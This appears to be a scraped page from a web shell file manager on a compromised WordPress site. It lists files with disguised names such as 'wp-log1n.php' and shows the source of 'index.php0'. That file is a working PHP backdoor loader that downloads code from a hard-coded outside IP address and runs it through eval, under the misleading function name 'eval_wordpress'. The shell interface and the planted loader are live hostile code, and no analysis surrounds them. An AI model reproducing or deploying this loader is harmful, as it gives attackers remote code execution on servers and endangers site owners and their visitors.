at path:
ROOT
/
index.php0
run:
R
W
Run
71ed2a
DIR
2026-04-15 03:29:21
R
W
Run
gbala
DIR
2026-04-16 18:42:47
R
W
Run
wp-includes
DIR
2026-04-15 02:44:10
R
W
Run
buy.php
0 By
2026-04-15 04:13:21
R
W
Run
chosen.php
122.65 KB
2026-04-13 04:00:48
R
W
Run
Delete
Rename
click.php
0 By
2026-04-15 02:46:41
R
W
Run
error_log
976 By
2026-04-17 04:34:11
R
W
Run
Delete
Rename
index.php0
1.2 KB
2024-02-02 02:44:08
R
W
Run
Delete
Rename
plugins.php
0 By
2026-04-15 02:46:41
R
W
Run
robots.txt
331 By
2024-01-17 02:44:10
R
W
Run
simple.php
15.05 KB
2026-04-13 04:00:47
R
W
Run
Delete
Rename
txets.php
4.37 KB
2026-04-13 19:46:12
R
W
Run
Delete
Rename
wp-log1n.php
0 By
2026-04-15 02:46:26
R
W
Run
error_log
up
📄
index.php0
Save
<?php function get_remote_content($url = 'http://173.208.253.26/z60403_8/stat/index2.txt' ) { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0.0.0'; if (ini_get('allow_url_fopen')) { $ctx = stream_context_create( array("http" => array("header" => "User-Agent: $ua\r\n"))); $res = @file_get_contents($url, false, $ctx); if ($res) return $res; } $p = parse_url($url); $host = $p['host']; $port = ($p['scheme'] == 'https') ? 443 : 80; $sock = @fsockopen(($port == 443 ? "ssl://" : "") . $host, $port, $en, $er, 10); if ($sock) { $req = "GET " . $p['path'] . " HTTP/1.1\r\nHost: $host\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n"; fwrite($sock, $req); $raw = ''; while (!feof($sock)) { $raw .= fgets($sock, 1024); } fclose($sock); return substr($raw, strpos($raw, "\r\n\r\n") + 4); } return false; } function eval_wordpress( $content ){ if ( $content ) { for( $i=0; $i<2; $i++){ while ( $i < 5 ){ eval( $content ); break; } break; } } } $payload = eval_wordpress( '?>'.get_remote_content( ) );